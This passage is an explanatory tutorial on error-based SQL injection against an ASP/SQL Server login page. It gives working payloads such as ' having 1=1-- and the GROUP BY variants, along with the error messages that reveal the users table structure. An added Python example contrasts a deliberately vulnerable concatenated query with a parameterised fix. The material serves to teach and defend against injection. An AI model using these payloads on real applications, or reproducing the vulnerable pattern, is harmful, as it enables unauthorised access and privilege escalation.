This technique was first discovered by David Litchfield
and the author in the course of a penetration test;
David later wrote a paper on the technique, and subsequent authors
have referenced this work. This explanation discusses the mechanisms
underlying the 'error message' technique, enabling one to fully
understand it, and potentially originate variations of their own.

So I am giving credit where it is due ............

Let's do it. Our 'users' table may have been created with the following command:

create table users (id int,
username varchar(255),
password varchar(255),
privs int
)

and the users inserted:

insert into users values(0, 'admin', 'r00tr0x!', 0xffff)

insert into users values (0, 'guest', 'guest', 0x0000)

insert into users values (0, 'chris', 'password', 0x00ff)

insert into users values (0, 'frank', 'sesame', 0x00ff)

Ok, so we want to insert a user account for ourselves. Without knowing the structure of the 'users' table, we are unlikely to meet with success. Even if luck is with us, the significance of the 'privs' field is unclear. We might insert a '1' and give ourselves a low-privileged account when we really wanted administrative access.

Fortunately, if error messages are returned to the browser (the default ASP configuration; yes, I did say fortunately, there is good in them sometimes), we can determine the entire structure of the DB.

First we want to establish the names of the tables that the query operates on, and the names of the fields:

Username: ' having 1=1--

and we get this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/process_login.asp, line 35


So we now know the table name and the column name of the first column, and can continue through the columns one field at a time using 'Group By'.

Username: ' group by users.id having 1=1--

And we get this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/process_login.asp, line 35


Eventually we arrive at the following 'username':

' group by users.id, users.username, users.password, users.privs having 1=1--

Here we get no errors, and it is (at least functionally) equivalent to:

select * from users where username = ''

So we now know that the query is referencing only the 'users' table, and is using the columns 'id', 'username', 'password' and 'privs', in that order.
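As an added example (not code from the original write-up or from process_login.asp), here is the login query the text reconstructs, written in Python against an in-memory SQLite stand-in for SQL Server, beside a hardened version: the vulnerable handler concatenates the username into the SQL and echoes any driver error verbatim, while the hardened one binds parameters and returns only a generic result. The table rows are the page's sample data; SQLite is an assumption, and its error wording differs from SQL Server's even though the concatenation problem is identical.

```python
import sqlite3

# The page's second probe, used here as a constructed test input.
PROBE = "' group by users.id having 1=1--"


def make_db():
    """Constructed in-memory copy of the page's 'users' table (sample data only)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (id int, username varchar(255), "
                "password varchar(255), privs int)")
    con.executemany("insert into users values (?, ?, ?, ?)", [
        (0, "admin", "r00tr0x!", 0xFFFF), (0, "guest", "guest", 0x0000),
        (0, "chris", "password", 0x00FF), (0, "frank", "sesame", 0x00FF)])
    return con


def vulnerable_login(con, username, password):
    """String-concatenated query in the style of the page's process_login.asp.

    Returns (outcome, sql) so the caller can see how the input rewrote the
    statement. Any driver error is echoed verbatim, which is exactly what lets
    the HAVING / GROUP BY technique read column names off the error text.
    """
    sql = (f"select * from users where username = '{username}' "
           f"and password = '{password}'")
    try:
        row = con.execute(sql).fetchone()
        return ("ok" if row else "denied"), sql
    except sqlite3.Error as exc:
        return f"error: {exc}", sql   # leaks the driver's message to the client


def hardened_login(con, username, password):
    """Parameterised query: the probe is bound as a literal value, never parsed
    as SQL, so '--' and 'group by' inside it have no effect on the statement.
    Driver errors go to a server-side log (a list here) and the client only
    ever sees 'ok' or 'denied'."""
    server_log = []
    sql = "select * from users where username = ? and password = ?"
    try:
        row = con.execute(sql, (username, password)).fetchone()
        return "ok" if row else "denied"
    except sqlite3.Error as exc:
        server_log.append(f"login query failed: {exc}")   # keep detail internal
        return "denied"
```

Run the probe through both handlers: the vulnerable one builds a statement whose `and password = ...` clause has been commented out, while the hardened one simply fails to find a user with that literal name.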

Of course it would be useful to figure out the types of each column, too.

I've been up for about 60 hours straight and that will have to wait until part II.